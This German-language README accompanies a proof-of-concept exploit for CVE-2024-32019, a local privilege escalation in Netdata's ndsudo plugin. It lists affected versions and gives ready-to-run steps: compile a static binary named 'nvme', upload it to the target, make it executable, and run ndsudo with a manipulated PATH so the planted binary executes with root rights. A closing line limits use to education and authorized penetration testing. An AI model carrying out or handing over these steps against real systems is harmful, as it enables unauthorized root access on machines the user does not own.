
Proof-of-concept-Exploit für CVE-2024-32019, der eine lokale Rechteausweitung über einen nicht vertrauenswürdigen Suchpfad im ndsudo-Plugin von Netdata demonstriert. Enthält Kompilieranweisungen und Bereitstellungsschritte.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo lokale Privilegieneskalation über nicht vertrauenswürdigen Suchpfad.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
Übertragen Sie die kompilierte Binärdatei auf die anfällige Maschine.
Machen Sie sie ausführbar:
chmod +x nvme
Nutzen Sie die anfällige Binärdatei über PATH-Manipulation aus (verwenden Sie denselben Pfad, in den Sie Ihre Binärdatei hochgeladen haben):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Dieser Proof-of-Concept (PoC)-Code wird nur für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.